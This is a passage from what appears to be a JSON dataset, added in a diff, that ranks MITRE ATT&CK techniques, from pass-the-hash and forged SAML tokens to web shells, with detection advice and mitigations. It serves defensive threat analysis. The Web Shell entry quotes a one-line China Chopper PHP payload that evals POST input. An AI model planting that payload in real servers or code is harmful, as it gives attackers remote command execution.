smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through Credential Access techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.", + "url": "https://attack.mitre.org/techniques/T1550", + "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", + "score": 0.7736619047619047, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "subtechniques": [ + { + "tid": "T1550.001", + "name": "Use Alternate Authentication Material: Application Access Token", + "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\nFor example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.", + "url": "https://attack.mitre.org/techniques/T1550/001", + "detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1550.002", + "name": "Use Alternate Authentication Material: Pass the Hash", + "description": "Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\nWhen performing PtH, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform Pass the Ticket attacks.(Citation: Stealthbits Overpass-the-Hash)", + "url": "https://attack.mitre.org/techniques/T1550/002", + "detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.\nEvent ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ] + }, + { + "tid": "T1550.003", + "name": "Use Alternate Authentication Material: Pass the Ticket", + "description": "Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\nWhen preforming PtT, valid Kerberos tickets for Valid Accounts are captured by OS Credential Dumping. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)\nA Silver Ticket can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\nA Golden Ticket can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. Pass the Hash) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)", + "url": "https://attack.mitre.org/techniques/T1550/003", + "detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1550.004", + "name": "Use Alternate Authentication Material: Web Session Cookie", + "description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through Steal Web Session Cookie or Web Cookies, the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)", + "url": "https://attack.mitre.org/techniques/T1550/004", + "detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", + "mitigations": [ + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + } + ] + }, + { + "rank": 90, + "tid": "T1020", + "name": "Automated Exfiltration", + "description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. \nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel and Exfiltration Over Alternative Protocol.", + "url": "https://attack.mitre.org/techniques/T1020", + "detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.", + "score": 0.7656915081780953, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [ + { + "tid": "T1020.001", + "name": "Automated Exfiltration: Traffic Duplication", + "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through ROMMONkit or Patch System Image.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with Network Sniffing, Input Capture, or Adversary-in-the-Middle depending on the goals and objectives of the adversary.", + "url": "https://attack.mitre.org/techniques/T1020/001", + "detection": "Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals). Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. ", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + } + ] + }, + { + "rank": 91, + "tid": "T1606", + "name": "Forge Web Credentials", + "description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from Steal Web Session Cookie, Steal Application Access Token, and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, Private Keys, or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator)\nOnce forged, adversaries may use these web credentials to access resources (ex: Use Alternate Authentication Material), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)", + "url": "https://attack.mitre.org/techniques/T1606", + "detection": "Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", + "score": 0.7622523809523809, + "network_score": 0.2, + "cloud_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ], + "subtechniques": [ + { + "tid": "T1606.001", + "name": "Forge Web Credentials: Web Cookies", + "description": "Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.\nAdversaries may generate these cookies in order to gain access to web resources. This differs from Steal Web Session Cookie and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, Private Keys, or other cryptographic seed values.\nOnce forged, adversaries may use these web cookies to access resources (Web Session Cookie), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)", + "url": "https://attack.mitre.org/techniques/T1606/001", + "detection": "Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1606.002", + "name": "Forge Web Credentials: SAML Tokens", + "description": "An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)\nAn adversary may utilize Private Keys to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from Steal Application Access Token and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\nAn adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to Use Alternate Authentication Material, which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)", + "url": "https://attack.mitre.org/techniques/T1606/002", + "detection": "This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML)\nConsider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + } + ] + }, + { + "rank": 92, + "tid": "T1534", + "name": "Internal Spearphishing", + "description": "Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)\nAdversaries may leverage Spearphishing Attachment or Spearphishing Link as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through Input Capture on sites that mimic email login interfaces.\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)", + "url": "https://attack.mitre.org/techniques/T1534", + "detection": "Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)", + "score": 0.7594000000000001, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 93, + "tid": "T1039", + "name": "Data from Network Shared Drive", + "description": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.", + "url": "https://attack.mitre.org/techniques/T1039", + "detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.7540285714285715, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 94, + "tid": "T1132", + "name": "Data Encoding", + "description": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.", + "url": "https://attack.mitre.org/techniques/T1132", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "score": 0.7178067583704761, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "subtechniques": [ + { + "tid": "T1132.001", + "name": "Data Encoding: Standard Encoding", + "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.", + "url": "https://attack.mitre.org/techniques/T1132/001", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1132.002", + "name": "Data Encoding: Non-Standard Encoding", + "description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) ", + "url": "https://attack.mitre.org/techniques/T1132/002", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + } + ] + }, + { + "rank": 95, + "tid": "T1505", + "name": "Server Software Component", + "description": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.", + "url": "https://attack.mitre.org/techniques/T1505", + "detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.\nProcess monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ", + "score": 0.7139041899790477, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [ + { + "tid": "T1505.001", + "name": "Server Software Component: SQL Stored Procedures", + "description": "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).\nAdversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) \nMicrosoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) ", + "url": "https://attack.mitre.org/techniques/T1505/001", + "detection": "On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1505.002", + "name": "Server Software Component: Transport Agent", + "description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. ", + "url": "https://attack.mitre.org/techniques/T1505/002", + "detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1505.003", + "name": "Server Software Component: Web Shell", + "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: China Chopper Web shell client).(Citation: Lee 2013) ", + "url": "https://attack.mitre.org/techniques/T1505/003", + "detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n<?php @eval($_POST['password']);>\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\nFile monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)\nLog authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1505.004", + "name": "Server Software Component: IIS Components", + "description": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)\nAdversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)\nAdversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide 